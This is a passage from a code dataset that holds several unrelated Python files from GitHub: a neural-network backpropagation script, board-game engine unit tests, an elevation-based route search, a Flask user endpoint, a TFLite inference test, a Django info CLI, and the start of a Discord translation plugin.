2))\n\n    # compute output layer gradients\n    for i in range(np.size(output_layer_gradient_array, 1)):\n        for j in range(np.size(output_layer_gradient_array, 0)):\n            gradient = calculate_output_layer_gradient(network_outputs[i], targets[i], layer1_node_outputs[j])\n            output_layer_gradient_array[j][i] = gradient\n        output_layer_bias_gradients[0][i] = calculate_deltaz(network_outputs[i], targets[i])\n    \n    # compute hidden layer gradients\n    for i in range(np.size(hidden_layer_gradient_array, 1)):\n        for j in range(np.size(hidden_layer_gradient_array, 0)):\n            gradient = calculate_hidden_layer_gradient(network_outputs, targets, weights_2[i][0], weights_2[i][1], layer1_node_outputs[i], network_inputs[j])\n            hidden_layer_gradient_array[j][i] = gradient\n        hidden_layer_bias_gradients[0][i] = calculate_hidden_layer_bias_gradient(network_outputs, targets, weights_2[i][0], weights_2[i][1], layer1_node_outputs[i])\n\n    return output_layer_gradient_array, hidden_layer_gradient_array, output_layer_bias_gradients, hidden_layer_bias_gradients\n\n\ndef update_weights(weights, gradients):\n    \"\"\"Update the weights\"\"\"\n    # Updating by using Stochastic Gradient Descent\n\n    for i in range(np.size(weights, 0)):\n        for j in range(np.size(weights, 1)):\n            weights[i][j] = weights[i][j] - learning_rate * gradients[i][j]\n\n    return weights\n\ndef update_bias_weights(weights, gradients):\n    \"\"\"Update the bias weights\"\"\"\n    # Updating by using Stochastic Gradient Descent\n\n    for i in range(weights.size):\n        weights[i] = weights[i] - (learning_rate * gradients[i])\n\n    return weights\n\ndef back_prop(network_inputs, network_outputs, targets, layer1_node_outputs):\n    \"\"\"Perform back propagation of the neural network.\"\"\"\n    global weights_1, weights_2, bias_weights\n    output_layer_gradient_array = np.zeros((2, 2))\n    hidden_layer_gradient_array = np.zeros((3, 2))\n    output_layer_bias_gradient_array = np.zeros((1, 2))\n    hidden_layer_bias_gradient_array = np.zeros((1, 2))\n\n    # Calculate gradients\n    output_layer_gradient_array, hidden_layer_gradient_array, output_layer_bias_gradient_array, hidden_layer_bias_gradient_array = calculate_gradients(network_inputs, network_outputs, targets, layer1_node_outputs)\n\n    # Update weights\n    update_weights(weights_1, hidden_layer_gradient_array)\n    update_weights(weights_2, output_layer_gradient_array)\n    update_bias_weights(bias_weights[0], hidden_layer_bias_gradient_array[0])\n    update_bias_weights(bias_weights[1], output_layer_bias_gradient_array[0])\n\ndef train(train_set_inputs, train_set_labels):\n    \"\"\"Train the network with the training set.\"\"\"\n    for i in range(np.size(train_set_labels, 0)):\n        print(\"\\n\")\n        print(train_set_inputs[i])\n        # Forward pass\n        layer1_outputs, network_outputs = forward_pass(train_set_inputs[i])\n        print(\"\\nOutput: \" + str(network_outputs))\n        writeToFile(\"\\nOutput: \" + str(network_outputs))\n        writeToFile(\"\\tLabel: \" + str(train_set_labels[i]))\n        print(\"Label: \" + str(train_set_labels[i]))\n        loss = calculate_loss(network_outputs, train_set_labels[i])\n        print(\"Loss: \" + str(loss))\n        writeToFile(\"\\tLoss: \" + str(loss))\n\n        # Back propagation\n        back_prop(train_set_inputs[i], network_outputs, train_set_labels[i], layer1_outputs)\n\ndef calculate_accuracy(truePos, falsePos, trueNeg, falseNeg):\n    \"\"\"Calculate the accuracy of the network.\"\"\"\n    accuracy = (truePos + trueNeg)/(truePos + trueNeg + falsePos + falseNeg)\n\n    return accuracy\n\ndef test(test_set_inputs, test_set_labels):\n    \"\"\"Test the network with the test set.\"\"\"\n    tp = 0\n    fp = 
0\n tn = 0\n fn = 0\n\n\n for i in range(np.size(test_set_labels, 0)):\n layer1_outputs, network_outputs = forward_pass(test_set_inputs[i])\n print(\"\\nOutput: \" + str(network_outputs))\n print(\"Label: \" + str(test_set_labels[i]))\n writeToFile(\"\\nOutput: \" + str(network_outputs))\n writeToFile(\"\\tLabel: \" + str(test_set_labels[i]))\n\n if test_set_labels[i][0] == 1.0:\n if network_outputs[0] > network_outputs[1]:\n tp = tp + 1\n else:\n fn = fn + 1\n elif test_set_labels[i][1] == 1.0:\n if network_outputs[1] > network_outputs[0]:\n tn = tn + 1\n else:\n fp = fp + 1\n\n accuracy = calculate_accuracy(tp, fp, tn, fn)\n print(\"\\n__________________\")\n print(\"Accuracy: \" + str(accuracy))\n writeToFile(\"\\n__________________\")\n writeToFile(\"\\nAccuracy: \" + str(accuracy))\n\ndef writeToFile(text):\n with open(write_file, 'a') as f:\n f.write(text)\n\ndef main():\n lines = read_data()\n i_train, i_test, o_train, o_test = split_data(lines)\n\n print(\"\\tTraining\")\n writeToFile(\"\\nTraining\")\n print(\"__________________\")\n writeToFile(\"\\n__________________\")\n train(i_train, o_train)\n\n print(\"\\n\\tTesting\")\n writeToFile(\"\\n\\nTesting\")\n print(\"__________________\")\n writeToFile(\"\\n__________________\")\n test(i_test, o_test)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"shaniceC/Neural-Network","sub_path":"neuralnet.py","file_name":"neuralnet.py","file_ext":"py","file_size_in_byte":10328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74511933688","text":"import unittest\nimport itertools\nfrom battleline.engine.BoardLogic import BoardLogic\nfrom battleline.model.FormationLogic import FormationLogic\nfrom battleline.model.Flag import FlagAlreadyClaimedError\nfrom battleline.Identifiers import Identifiers, TroopCard\n\n\nclass MockOutput(object):\n\n def play_action(self, place, card, flagNumber):\n pass\n\n def claim_action(self, place, flagNumber):\n pass\n\n def declare_winner(self, place):\n pass\n\n def setup_player_positions(self, playerName, place):\n pass\n\n\nclass MockEngine(object):\n\n def __init__(self):\n self.played_cards = []\n self.output_handler = MockOutput()\n\n def get_unplayed_cards(self):\n return set(get_all_cards()) - set(self.played_cards)\n\n\ndef get_all_cards():\n return [TroopCard(number, color) for number, color in itertools.product(range(1, 11), Identifiers.COLORS)]\n\n\nclass TestBoardLogic(unittest.TestCase):\n\n def setUp(self):\n self.logic = FormationLogic()\n self.engine = MockEngine()\n self.boardLogic = BoardLogic(self.engine)\n self.fullList = get_all_cards()\n\n def addCard(self, flag, player, card):\n self.boardLogic.addCard(flag, player, card)\n self.engine.played_cards.append(\n TroopCard(number=card[0], color=card[1]))\n \"\"\"test_checkAllFlags_empty\n\n test if the checkAllFlags function will work on an empty board\n \"\"\"\n\n def test_checkAllFlags_empty(self):\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n for flag in self.boardLogic.board.flags:\n self.assertEquals(flag.is_claimed(), False)\n\n def test_check_all_flags_one_side_empty_no_claim(self):\n self.addCard(0, Identifiers.NORTH, TroopCard(1, \"blue\"))\n self.addCard(0, Identifiers.NORTH, TroopCard(3, \"green\"))\n self.addCard(0, Identifiers.NORTH, TroopCard(5, \"red\"))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertNotEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n self.assertNotEqual(self.boardLogic.board.flags[\n 0].claimed, 
Identifiers.SOUTH)\n\n def test_check_all_flags_one_side_empty_north_winner(self):\n for i, colors in enumerate(Identifiers.COLORS):\n if i + 1 != len(Identifiers.COLORS):\n self.addCard(i, Identifiers.NORTH, TroopCard(8, colors))\n self.addCard(i, Identifiers.NORTH, TroopCard(9, colors))\n self.addCard(i, Identifiers.SOUTH, TroopCard(10, colors))\n else:\n self.addCard(i, Identifiers.NORTH, TroopCard(8, colors))\n self.addCard(i, Identifiers.NORTH, TroopCard(9, colors))\n self.addCard(i, Identifiers.NORTH, TroopCard(10, colors))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n i].claimed, Identifiers.NORTH)\n\n def test_check_all_flags_one_side_empty_north_winner_formation_equivalent(self):\n self.addCard(0, Identifiers.NORTH,\n TroopCard(8, Identifiers.COLORS[0]))\n self.addCard(0, Identifiers.NORTH,\n TroopCard(9, Identifiers.COLORS[0]))\n self.addCard(0, Identifiers.NORTH,\n TroopCard(10, Identifiers.COLORS[0]))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n\n \"\"\"test_checkAllFlags_FlagContested_basic\n\n test if the checkAllFlags function will work on a non-empty board\n \"\"\"\n\n def test_checkAllFlags_FlagContested_basic(self):\n # flag 1: 10-9-8 vs 1-2-3\n self.addCard(0, Identifiers.NORTH, TroopCard(10, 'blue'))\n self.addCard(0, Identifiers.SOUTH, TroopCard(1, 'blue'))\n\n self.addCard(0, Identifiers.NORTH, TroopCard(9, 'blue'))\n self.addCard(0, Identifiers.SOUTH, TroopCard(2, 'blue'))\n\n self.addCard(0, Identifiers.NORTH, TroopCard(8, 'blue'))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n with self.assertRaisesRegexp(FlagAlreadyClaimedError, \"south is attempting to place card on already claimed flag.\"):\n self.addCard(0, Identifiers.SOUTH, TroopCard(3, 'blue'))\n self.assertEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n\n # flag 2: 10R-9R-8R vs 1-2-3\n self.addCard(1, Identifiers.SOUTH, TroopCard(1, 'red'))\n self.addCard(1, Identifiers.NORTH, TroopCard(10, 'red'))\n\n self.addCard(1, Identifiers.SOUTH, TroopCard(2, 'red'))\n self.addCard(1, Identifiers.NORTH, TroopCard(9, 'red'))\n\n self.addCard(1, Identifiers.SOUTH, TroopCard(3, 'red'))\n self.addCard(1, Identifiers.NORTH, TroopCard(8, 'red'))\n self.boardLogic.checkAllFlags(Identifiers.SOUTH)\n self.assertEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n 1].claimed, Identifiers.NORTH)\n\n # flag 3: 10-9-_ vs 1-2-3 (8 is played on flag 9)\n self.addCard(8, Identifiers.SOUTH, TroopCard(8, 'green'))\n\n self.addCard(2, Identifiers.NORTH, TroopCard(10, 'green'))\n self.addCard(2, Identifiers.SOUTH, TroopCard(1, 'green'))\n\n self.addCard(2, Identifiers.NORTH, TroopCard(9, 'green'))\n self.addCard(2, Identifiers.SOUTH, TroopCard(2, 'green'))\n\n self.addCard(8, Identifiers.NORTH, TroopCard(5, 'blue'))\n self.addCard(2, Identifiers.SOUTH, TroopCard(3, 'green'))\n self.boardLogic.checkAllFlags(Identifiers.SOUTH)\n self.assertEqual(self.boardLogic.board.flags[\n 2].claimed, Identifiers.SOUTH)\n\n \"\"\"test_checkAllFlags_FlagContested_tied\n\n test if the checkAllFlags function will work when both formations and values are exactly the same\n \"\"\"\n\n def test_checkAllFlags_FlagContested_tied(self):\n # flag 5: 7-6-5(yellow) vs 7-6-5(purple)\n self.addCard(4, Identifiers.NORTH, TroopCard(7, 'yellow'))\n self.addCard(4, Identifiers.SOUTH, 
TroopCard(7, 'purple'))\n\n        self.addCard(4, Identifiers.NORTH, TroopCard(6, 'yellow'))\n        self.addCard(4, Identifiers.SOUTH, TroopCard(6, 'purple'))\n\n        self.addCard(4, Identifiers.NORTH, TroopCard(5, 'yellow'))\n        self.addCard(4, Identifiers.SOUTH, TroopCard(5, 'purple'))\n        self.boardLogic.checkAllFlags(Identifiers.NORTH)\n        self.assertEqual(self.boardLogic.board.flags[\n                         4].claimed, Identifiers.NORTH)\n\n        # flag 6: 3-2-1(yellow) vs 3-2-1(purple)\n        self.addCard(5, Identifiers.SOUTH, TroopCard(3, 'purple'))\n        self.addCard(5, Identifiers.NORTH, TroopCard(3, 'yellow'))\n\n        self.addCard(5, Identifiers.SOUTH, TroopCard(2, 'purple'))\n        self.addCard(5, Identifiers.NORTH, TroopCard(2, 'yellow'))\n\n        self.addCard(5, Identifiers.SOUTH, TroopCard(1, 'purple'))\n        self.addCard(5, Identifiers.NORTH, TroopCard(1, 'yellow'))\n\n        # Since north added a card last, it shouldn't claim the flag at the end of its turn\n        self.boardLogic.checkAllFlags(Identifiers.NORTH)\n        self.assertEqual(self.boardLogic.board.flags[5].claimed, None)\n\n        # South finished first, so it should claim it at the end of its turn\n        self.boardLogic.checkAllFlags(Identifiers.SOUTH)\n        self.assertEqual(self.boardLogic.board.flags[\n                         5].claimed, Identifiers.SOUTH)\n\n    def test_flag_is_playable(self):\n        self.assertTrue(self.boardLogic.is_flag_playable(0, Identifiers.NORTH))\n        self.assertTrue(self.boardLogic.is_flag_playable(0, Identifiers.SOUTH))\n\n        self.boardLogic.board.get_flag(1).sides[Identifiers.NORTH] = [TroopCard(\n            1, \"color1\"), TroopCard(2, \"color1\"), TroopCard(3, \"color1\")]\n        self.boardLogic.checkAllFlags(Identifiers.NORTH)\n        self.assertFalse(\n            self.boardLogic.is_flag_playable(0, Identifiers.NORTH))\n        self.assertTrue(self.boardLogic.is_flag_playable(0, Identifiers.SOUTH))\n\n    def test_flag_is_all_flags_playable(self):\n        self.assertTrue(self.boardLogic.is_any_flag_playable(Identifiers.NORTH))\n        for flag in range(1, 10):\n            self.boardLogic.board.get_flag(flag).sides[Identifiers.NORTH] = [TroopCard(\n                1, \"color1\"), TroopCard(2, \"color1\"), TroopCard(3, \"color1\")]\n        self.assertFalse(\n            self.boardLogic.is_any_flag_playable(Identifiers.NORTH))\n        self.assertTrue(self.boardLogic.is_any_flag_playable(Identifiers.SOUTH))\n\n    def test_check_breakthrough(self):\n        # 3 adjacent flags.\n        for flag, colorId in zip([1, 2, 3], range(0, 3)):\n            for cardValue in range(8, 11):\n                self.boardLogic.checkAllFlags(Identifiers.NORTH)\n                self.assertIsNone(self.boardLogic.winner)\n                self.boardLogic.addCard(\n                    flag, Identifiers.NORTH, TroopCard(cardValue, Identifiers.COLORS[colorId]))\n        self.boardLogic.checkAllFlags(Identifiers.NORTH)\n        self.assertEqual(self.boardLogic.winner, Identifiers.NORTH)\n\n    def test_check_envelopment(self):\n        # 5 flags.\n        for flag, colorId in zip([1, 2, 4, 5, 7], range(0, 5)):\n            for cardValue in range(8, 11):\n                self.boardLogic.checkAllFlags(Identifiers.NORTH)\n                self.assertIsNone(self.boardLogic.winner)\n                self.boardLogic.addCard(\n                    flag, Identifiers.NORTH, TroopCard(cardValue, Identifiers.COLORS[colorId]))\n        self.boardLogic.checkAllFlags(Identifiers.NORTH)\n        self.assertEqual(self.boardLogic.winner, Identifiers.NORTH)\n","repo_name":"spelinski/BoardGameAiEngine","sub_path":"test/battleline/engine/testBoardLogic.py","file_name":"testBoardLogic.py","file_ext":"py","file_size_in_byte":9819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"44323661897","text":"# Isakov V.E.\r\n\r\nimport csv\r\nimport json\r\n\r\n\r\n# generator\r\ndef mygen():\r\n    for i in range(5, 91):\r\n        yield 
i\r\n\r\n\r\nmy_dict = dict()\r\n\r\n\r\ndef f1(x):\r\n    return x / (x + 100)\r\n\r\n\r\ndef f2(x):\r\n    return 1 / x\r\n\r\n\r\ndef f3(x):\r\n    return 20 * (f1(x) + f2(x)) / x\r\n\r\n\r\nprint(\"Create a dictionary with functions results\")\r\nprint(\"f1(x) = x / (x + 100)\")\r\nprint(\"f2(x) = 1 / x\")\r\nprint(\"f3(x) = 20 * (f1(x) + f2(x)) / x\")\r\nprint(\"\\nx - [f1(x), f2(x), f3(x)]\")\r\n\r\nfor x in mygen():\r\n    my_dict[x] = [f1(x), f2(x), f3(x)]\r\n    print(x, \" - \", my_dict[x])\r\n\r\nprint(\"\\nCreate a csv file and write into it ...\")\r\nwith open('result.csv', 'w') as my_file:\r\n    my_csv_writer = csv.writer(\r\n        my_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n    my_csv_writer.writerow([\"x\", \"f1(x)\", \"f2(x)\", \"f3(x)\"])\r\n    for x in my_dict:\r\n        my_csv_writer.writerow([x] + my_dict[x])\r\n    print(\"Done\")\r\n\r\nprint(\"\\nRead data from csv file ...\")\r\nmy_list = list()\r\nwith open('result.csv', 'r') as my_file:\r\n    my_csv_reader = csv.reader(\r\n        my_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n    for row in my_csv_reader:\r\n        if row:\r\n            my_list.append(row)\r\nfor row in my_list:\r\n    print(row)\r\n\r\nprint(\"\\nWrite data into json file ...\")\r\nwith open('result.json', 'w') as my_file:\r\n    json.dump(my_list, my_file, indent=4)\r\nprint(\"Done\")\r\n","repo_name":"isakov-github/study","sub_path":"lesson_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"1259664480","text":"\"\"\"\n    Elevation gain maximization algorithm within x% of shortest path\n\n    @author: Benjamin Guinsburg\n\"\"\"\n\nimport networkx as nx, osmnx as ox\nimport copy\n\n\ndef find_path_edges(graph, path, max_weight='ele_gain'):\n\t\"\"\"\n    Given a path as a list of nodes, and the weight to maximize, finds the \n    edges that will maximize the weight between each node in the list. For \n    convenience, this function returns the length and elevation gain found along\n    all of these edges, in addition to the list of keys that corresponds to \n    these edges.\n    \n    Parameters:\n    -----------\n    graph: NetworkX MultiDiGraph\n        The graph that this path belongs to.\n    path: list of int\n        Each int should represent a node id in the graph along a path.\n    max_weight: string\n        The weight that will be maximized along the path.\n    \n    Returns: \n    --------\n    path_length: float\n        The total distance along every edge found\n    path_ele_gain: float\n        The total elevation gain along every edge found\n    path_edge_keys: list of int\n        Each int represents the key of the edge between two consecutive nodes \n        in path which maximizes max_weight.
\n\t\"\"\"\n\tpath_length = 0\n\tpath_ele_gain = 0\n\tpath_edge_keys = []\n\tfor i in range(len(path) - 1):\n\t\tedges = graph[path[i]][path[i + 1]]\n\t\tmax_weight_edge = max(edges.keys(), key=lambda k: edges[k][max_weight])\n\t\tpath_length += edges[max_weight_edge]['length']\n\t\tpath_ele_gain += edges[max_weight_edge]['ele_gain']\n\t\tpath_edge_keys.append(max_weight_edge)\n\treturn (path_length, path_ele_gain, path_edge_keys)\n\ndef edge_path(node_path, edge_keys):\n\t\"\"\"\n    Given a path as a list of nodes, and the key representing the edge between\n    each node in the list, returns the path as a list of edges in the form\n    (u, v, key).\n    \n    Parameters:\n    -----------\n    node_path: list of int\n        Each int should represent a node id in the graph along a path.\n    edge_keys: list of int\n        Each int should represent the key of the edge between two nodes in\n        node_path.\n    \n    Returns: \n    --------\n    edge_path: list of (int, int, int)\n        Each tuple (u, v, key) in the list represents an edge in the graph:\n        graph[u][v][key].\n\t\"\"\"\n\tedge_path = []\n\tfor i in range(len(node_path) - 1):\n\t\tedge_path.append((node_path[i], node_path[i + 1], edge_keys[i]))\n\treturn edge_path\n\n\n\"\"\"\nGiven a graph, networkx will generate the shortest path P from source to target based on length.\n\nIt will then loop over the nodes of P, and for each node it will create a list L of all paths \nfrom P_n to P_n+1 with some cutoff depth. \nThe graph handed to nx.all_simple_paths will have had all nodes P_0 through P_n-1 removed [IMPORTANT].\nIt loops over L to find the path that has these properties:\n    1. ele_gain >= 0\n    2. length(P_0 -> P_n) + length(L[i]) + length(P_n+1 -> P_k) stays within max_length\n    3. L[i] has the highest ele_gain in L\n\nUpon finding this path P_new, it will be inserted between P_n and P_n+1.\n\"\"\"\n\n
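# A hypothetical usage sketch (made-up node ids; assumes an osmnx-style\n# MultiDiGraph whose edges carry 'length' and 'ele_gain' attributes):\n#   dist, gain, path = maximize(graph, 123, 456, percent_shortest_path=1.5)\n\n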
def maximize(graph, source, target, percent_shortest_path):\n    shortest_path = nx.shortest_path(graph, source, target, 'length')\n    working_path = copy.deepcopy(shortest_path)\n\n    shortest_path_len = nx.shortest_path_length(graph, source, target, 'length')\n    max_length = shortest_path_len * percent_shortest_path\n\n    alternate_paths_list = []\n\n    # loop over nodes in the path to build alternate_paths_list\n    for i in range(len(shortest_path)-1):\n        currentNode = shortest_path[i]\n        nextNode = shortest_path[i+1]\n\n        print(\"got currentNode = %d, and nextNode = %d, at iteration %d\" % (currentNode, nextNode, i))\n\n        # remove all nodes except currentNode and nextNode from the graph for this function\n        graph_truncated = copy.deepcopy(graph)\n        graph_truncated.remove_nodes_from(shortest_path[0:i] + shortest_path[i + 2:])\n        interPaths = nx.all_simple_paths(graph_truncated, currentNode, nextNode, cutoff=10)\n\n        # find path in interPaths that has the highest ele-gain\n        ele_gain_max = 0\n        path_length = 0\n        biggestPath = []\n\n        for path in interPaths:\n            # find_path_edges returns (length, ele_gain, keys), in that order\n            length, ele_gain, _ = find_path_edges(graph, path)\n\n            if (ele_gain < 0): continue\n\n            if (ele_gain > ele_gain_max):\n                ele_gain_max = ele_gain\n                path_length = length\n                biggestPath = path\n\n        biggest_path_length = len(biggestPath)\n\n        if (path_length != 0 and biggest_path_length != 2):\n            alternate_paths_list.append( (ele_gain_max/path_length, path_length, biggestPath, currentNode, nextNode) )\n\n\n    alternate_paths_list.sort(key=lambda tup: tup[0], reverse=True)\n\n    # loop over alternate_paths_list, and insert into working path\n    for alt in alternate_paths_list:\n        working_path = insertPath(graph, working_path, alt[1], alt[2], alt[3], alt[4], max_length)\n    \n    # Show path on actual data model\n    # Note: Google Maps and OpenStreetMaps have different data and our UI path\n    # may differ from the actual path because of Google Maps' interpretation of\n    # the data it receives.\n    #ox.plot_graph_route(graph, working_path)\n    \n    best_dist, best_gain, best_keys = find_path_edges(graph, working_path)\n    best_path = edge_path(working_path, best_keys)\n    return (best_dist, best_gain, best_path)\n\n\ndef insertPath(graph, working_path, path_length, path, node1, node2, max_length):\n    node1_ind = working_path.index(node1)\n    node2_ind = working_path.index(node2)\n\n    if path_length > max_length:\n        return working_path\n    else:\n        return working_path[0:node1_ind] + path + working_path[node2_ind + 1:]","repo_name":"pratikmehta14/EleNa","sub_path":"flask/app/model/routing/max_search.py","file_name":"max_search.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"16253240276","text":"from flask import request\nfrom flask_restful import Resource\nfrom typing import Dict, Any, Tuple\nfrom db.api import get_user, del_user, add_user, get_user_data_from_JWT\nfrom db.classes import User as DB_User\n\n\nclass Users(Resource):\n\n    def get(self) -> Dict[str, Any]:\n        name = request.args.get('name')\n        user = get_user(DB_User(name))\n        if user:\n            return user.dict()\n        return None\n\n    def post(self) -> Tuple[Dict[str, Any], int]:\n        # need header: Content-type: application/json\n        if 'x-access-token' in request.headers:\n            if get_user_data_from_JWT(request.headers['x-access-token'])['role'] != \"admin\":\n                return None\n        else:\n            return None\n        data: dict = request.get_json()\n        name: str = data[\"name\"]\n        role: str = data[\"role\"]\n        user_jwt: str = \"\"\n        added_user: dict = add_user(DB_User(name, role, user_jwt))\n        if added_user:\n            del added_user[\"_id\"]\n        return added_user, 201\n\n    def delete(self) -> Dict[str, Any]:\n        if 'x-access-token' in request.headers:\n            if get_user_data_from_JWT(request.headers['x-access-token'])['role'] != \"admin\":\n                return None\n        else:\n            return None\n        name = request.args.get('name')\n        user = get_user(DB_User(name))\n        if not user:\n            return None\n        del_user(user)\n        return user.dict()\n","repo_name":"maikleProko/examples-Python","sub_path":"prog001/src/routes/Users.py","file_name":"Users.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"71952987448","text":"import tflite_runtime.interpreter as tflite\nimport numpy as np\n\n\nif __name__ == '__main__':\n    interpreter = tflite.Interpreter(model_path='basic.tflite',\n                                     experimental_delegates=[tflite.load_delegate('libedgetpu.so.1')])\n    interpreter.allocate_tensors()\n\n    # Get input and output tensors.\n    input_details = interpreter.get_input_details()\n    output_details = interpreter.get_output_details()\n\n    # Test the model on random input data.\n    input_shape = input_details[0]['shape']\n    input_data = np.array(np.random.random_sample(input_shape), dtype=np.int8)\n    interpreter.set_tensor(input_details[0]['index'], input_data)\n\n    interpreter.invoke()\n\n    # The function `get_tensor()` returns a copy of the tensor data.\n    # Use `tensor()` in order to get a pointer to the tensor.\n    output_data = interpreter.get_tensor(output_details[0]['index'])\n    
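# Note: for a fully int8-quantized model these are raw quantized values;\n    # output_details[0]['quantization'] holds the scale/zero-point to dequantize.\n    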
print(output_data)\n","repo_name":"BryanJHealy/coral_amici","sub_path":"src/util/basic_inference_test.py","file_name":"basic_inference_test.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73774941369","text":"import pathlib\n\nimport click\nimport django\n\n\n# set up django. must be done before loading models. NB: requires DJANGO_SETTINGS_MODULE to be set\ndjango.setup()\n\nfrom forecast_repo.settings.local_sqlite3 import DATABASES\n\nfrom utils.project_truth import truth_data_qs, oracle_model_for_project\nfrom forecast_app.models import Project\n\n\n@click.command()\n@click.argument('sqlite_file', type=click.Path(dir_okay=False, exists=True, path_type=pathlib.Path))\n@click.argument('verbosity', type=click.Choice(['1', '2', '3', '4']), default='1')\ndef main(sqlite_file, verbosity):\n \"\"\"\n :param sqlite_file: the sqlite database file to print info from. as created by `bulk_data_load_app()`\n :param verbosity: increasing from 1 (minimal verbosity) to 3 (maximal)\n \"\"\"\n DATABASES['default']['NAME'] = sqlite_file\n\n projects = Project.objects.order_by('name')\n if len(projects) != 0:\n click.echo(f\"Found {len(projects)} projects: {projects}\")\n for project in projects:\n print_project_info(project, int(verbosity))\n else:\n click.echo(\"\")\n\n\ndef print_project_info(project, verbosity):\n # verbosity == 1\n oracle_model = oracle_model_for_project(project)\n first_truth_forecast = oracle_model.forecasts.first() if oracle_model else None\n click.echo(f\"\\n\\n* {project}. truth: # predictions={truth_data_qs(project).count()}, \"\n f\"source={repr(first_truth_forecast.source) if first_truth_forecast else ''}, \"\n f\"created_at={first_truth_forecast.created_at if first_truth_forecast else ''}. 
\"\n f\"(num_models, num_forecasts): {project.num_models_forecasts()}\")\n if verbosity == 1:\n return\n\n # verbosity == 2\n click.echo(f\"\\n** Targets ({project.targets.count()})\")\n for target in project.targets.all():\n click.echo(f\"- {target}\")\n\n click.echo(f\"\\n** Units ({project.units.count()})\")\n for unit in project.units.all().order_by('name'):\n click.echo(f\"- {unit}\")\n\n click.echo(f\"\\n** TimeZeros ({project.timezeros.count()})\")\n for timezero in project.timezeros.all():\n click.echo(f\"- {timezero}\")\n\n if verbosity == 2:\n return\n\n # verbosity == 3\n click.echo(f\"\\n** ForecastModels ({project.models.count()})\")\n for forecast_model in project.models.all():\n if verbosity == 3:\n click.echo(f\"- {forecast_model}\")\n else:\n click.echo(f\"*** {forecast_model} ({forecast_model.forecasts.count()} forecasts)\")\n if verbosity == 4:\n for forecast in forecast_model.forecasts.order_by('time_zero', 'issued_at'):\n click.echo(f\"- {forecast}: {forecast.pred_eles.count()} rows\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"reichlab/zoltpy","sub_path":"cli/print_project_info.py","file_name":"print_project_info.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"25506466373","text":"# originally from piyush: https://github.com/officialpiyush/modmail-plugins/translator\nimport discord\nfrom discord.ext import commands\n\nfrom googletrans import Translator\n\n\nclass TranslateToLanguage(commands.Cog):\n \"\"\"I translate text to specified languages.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.translator = Translator()\n\n languagelist = {\n \"afrikaans\": \"af\",\n \"albanian\": \"sq\",\n \"amharic\": \"am\",\n \"arabic\": \"ar\",\n \"armenian\": \"hy\",\n \"azerbaijani\": \"az\",\n \"basque\": \"eu\",\n \"belarusian\": \"be\",\n \"bengali\": \"bn\",\n \"bosnian\": \"bs\",\n \"bulgarian\": \"bg\",\n \"catalan\": \"ca\",\n \"cebuano\": \"ceb\",\n \"chichewa\": \"ny\",\n \"chinese-simplified\": \"zh-cn\",\n \"chinese-traditional\": \"zh-tw\",\n \"corsican\": \"co\",\n \"croatian\": \"hr\",\n \"czech\": \"cs\",\n \"danish\": \"da\",\n \"dutch\": \"nl\",\n \"english\": \"en\",\n \"esperanto\": \"eo\",\n \"estonian\": \"et\",\n \"filipino\": \"tl\",\n \"finnish\": \"fi\",\n \"french\": \"fr\",\n \"frisian\": \"fy\",\n \"galician\": \"gl\",\n \"georgian\": \"ka\",\n \"german\": \"de\",\n \"greek\": \"el\",\n \"gujarati\": \"gu\",\n \"haitian-creole\": \"ht\",\n \"hausa\": \"ha\",\n \"hawaiian\": \"haw\",\n \"hebrew\": \"iw\",\n \"hindi\": \"hi\",\n \"hmong\": \"hmn\",\n \"hungarian\": \"hu\",\n \"icelandic\": \"is\",\n \"igbo\": \"ig\",\n \"indonesian\": \"id\",\n \"irish\": \"ga\",\n \"italian\": \"it\",\n \"japanese\": \"ja\",\n \"javanese\": \"jw\",\n \"kannada\": \"kn\",\n \"kazakh\": \"kk\",\n \"khmer\": \"km\",\n \"korean\": \"ko\",\n \"kurdish-kurmanji\": \"ku\",\n \"kyrgyz\": \"ky\",\n \"lao\": \"lo\",\n \"latin\": \"la\",\n \"latvian\": \"lv\",\n \"lithuanian\": \"lt\",\n \"luxembourgish\": \"lb\",\n \"macedonian\": \"mk\",\n \"malagasy\": \"mg\",\n \"malay\": \"ms\",\n \"malayalam\": \"ml\",\n \"maltese\": \"mt\",\n \"maori\": \"mi\",\n \"marathi\": \"mr\",\n \"mongolian\": \"mn\",\n \"myanmar-burmese\": \"my\",\n \"nepali\": \"ne\",\n \"norwegian\": \"no\",\n \"pashto\": \"ps\",\n \"persian\": \"fa\",\n \"polish\": \"pl\",\n \"portuguese\": \"pt\",\n \"punjabi\": \"pa\",\n \"romanian\": \"ro\",\n \"russian\": \"ru\",\n \"samoan\": 
